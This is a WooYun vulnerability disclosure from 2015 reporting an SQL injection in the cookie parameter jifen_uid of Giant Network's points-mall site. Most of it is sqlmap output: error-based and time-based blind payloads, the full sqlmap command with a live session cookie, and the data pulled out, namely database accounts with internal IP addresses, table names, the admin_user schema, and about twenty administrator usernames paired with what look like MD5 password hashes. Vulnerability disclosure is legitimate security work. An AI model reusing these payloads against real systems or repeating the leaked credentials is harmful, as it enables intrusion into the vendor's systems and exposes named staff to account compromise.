当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140678

漏洞标题:巨人网络积分商城某处SQL注入

相关厂商:巨人网络

漏洞作者: 路人甲

提交时间:2015-09-13 09:28

修复时间:2015-09-18 09:30

公开时间:2015-09-18 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PS: 提交过一次,一直不过
本次在多截图列一下数据吧

详细说明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: jifen_uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid
_a=1509021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09
-02+10%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOl
siNDEyOTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_
uid=412921281 AND (SELECT 8728 FROM(SELECT COUNT(*),CONCAT(0x3a677a733a,(SELECT
(CASE WHEN (8728=8728) THEN 1 ELSE 0 END)),0x3a626f783a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); jifen_account=starjun; jifen_ha
sh=14e32109c896ed40085e93a70aeef359
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid
_a=1509021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09
-02+10%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOl
siNDEyOTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_
uid=412921281 AND SLEEP(5); jifen_account=starjun; jifen_hash=14e32109c896ed4008
5e93a70aeef359
---
[09:39:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.4.4
back-end DBMS: MySQL 5.0
[09:39:45] [INFO] fetching current database
[09:39:45] [INFO] resumed: vip
current database: 'vip'
SQLMAP:
D:\安全测试\sqlmapproject-sqlmap-b5060c0>sqlmap.py -u "http://jf.ztgame.com" --c
ookie "check_cookie_jsztgamecom=123; uniqid=1509021020226374620803; uniqid_a=150
9021020226374620803; ref=0; date=2015-09-02+10%3A20%3A22; ref_date=2015-09-02+10
%3A20%3A22; _jslog_logininfo_yzd=eyI0MTI5MjEyODEiOlsiNDEy
OTIxMjgxIiwiMjAxNS0wOS0wMiAxMDoyMToyNyIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_uid=41
2921281; jifen_account=starjun; jifen_hash=14e32109c896ed40085e93a70aeef359" --l
evel 5 --users

漏洞证明:

1: 数据库

1.png


2:users
database management system users [243]:
[*] ''@'localhost'
[*] 'jfsc'@'172.30.206.44'
[*] 'jfsc'@'172.30.206.45'
[*] 'jfsc'@'172.30.206.50'
[*] 'mmm_agent'@'172.30.206.46'
[*] 'mmm_agent'@'172.30.206.47'
[*] 'mmm_agent'@'172.30.206.48'
[*] 'mmm_agent'@'172.30.206.49'
[*] 'mmm_monitor'@'172.30.206.17'
[*] 'read'@'172.30.206.19'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'slave'@'172.30.206.46'
[*] 'slave'@'172.30.206.47'
[*] 'slave'@'172.30.206.48'
[*] 'slave'@'172.30.206.49'
[*] 'vip'@'172.30.206.%'
[*] 'write'@'172.30.206.18'
3: tables
[2410 tables]
+-------------------------+
| a0_a0_fill |
| admin_db |
| admin_delivery |
| admin_file |
| admin_pack |
| admin_pack_cb |
| admin_phone_bind |
| admin_shenhe |
| admin_user |
| data_20140423 |
| last_login_0 |
| last_login_1 |
| last_login_10 |
| last_login_100 |
| last_login_101 |
4: columns
Database: vip
Table: admin_user
[15 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| api_passwd | char(32) |
| game_per | mediumtext |
| group | varchar(20) |
| hash | char(32) |
| index_per | mediumtext |
| is_ban | tinyint(11) |
| is_super_admin | tinyint(4) |
| m_hash | char(32) |
| m_passwd | char(32) |
| passwd | char(32) |
| position | varchar(20) |
| server_ip | varchar(256) |
| url_per | mediumtext |
| user_id | int(11) |
| user_name | varchar(40) |
+----------------+--------------+
5: data
03fcbf8036254469c07c0dc5766254ee | yewenqi |
19627ef1bae730496582498d7cbdca7a | qiuhonghua |
19d6ddfa544f43c94d830e6e1a044aad | xinjian |
1cb80e0e86ee786aba88a2e3bd226e35 | mali1 |
229d246593fc8712c0811469a78bc189 | guokeqing |
2659e252256d5326c8fd93686208b827 | jiangmingye |
2a4d67a457d71bb58e9be35e3a843398 | zhangyunfeng |
30b700d225f10b81eef5f74837a06bed | hejun2 |
3bc0290c40cf56031fa2a0eaf6a7f3c8 | luokai |
3f95576ba58a9b2abff35ab2dc63c6e4 | panbinbin |
44dc6594bd45fce35844b5f1eeb897b6 | zhoujialin |
4c7e27b630209f4eb66ef84c93f93f85 | zhangmao |
54d4c9b3a6f3a7a08d17acd91badcddc | houxuefei |
56780793bb983ec2382d2b8b24999920 | liuhua1 |
57e4d13d55b50c8b5aac2014a6ad3c19 | zhuxianzhi |
5c9b7ec2a64d122c9b7b021896548ea9 | baojun |
5fa5a73fcafe7d2cc7d1c6164aacbbe5 | huangsong1 |
69603faf5110ad1539c22a666da318f6 | yangyanhu |
735d83d5ff7a7c3d9f19b45c026b9e61 | sanae007 |
7e31ea7cdf8a405688be99a1396dae73 | jinpeijun |
80b5d07eec8ac2f73e7ccd01ff843597 | yuyoucun |

修复方案:

如题

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-18 09:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无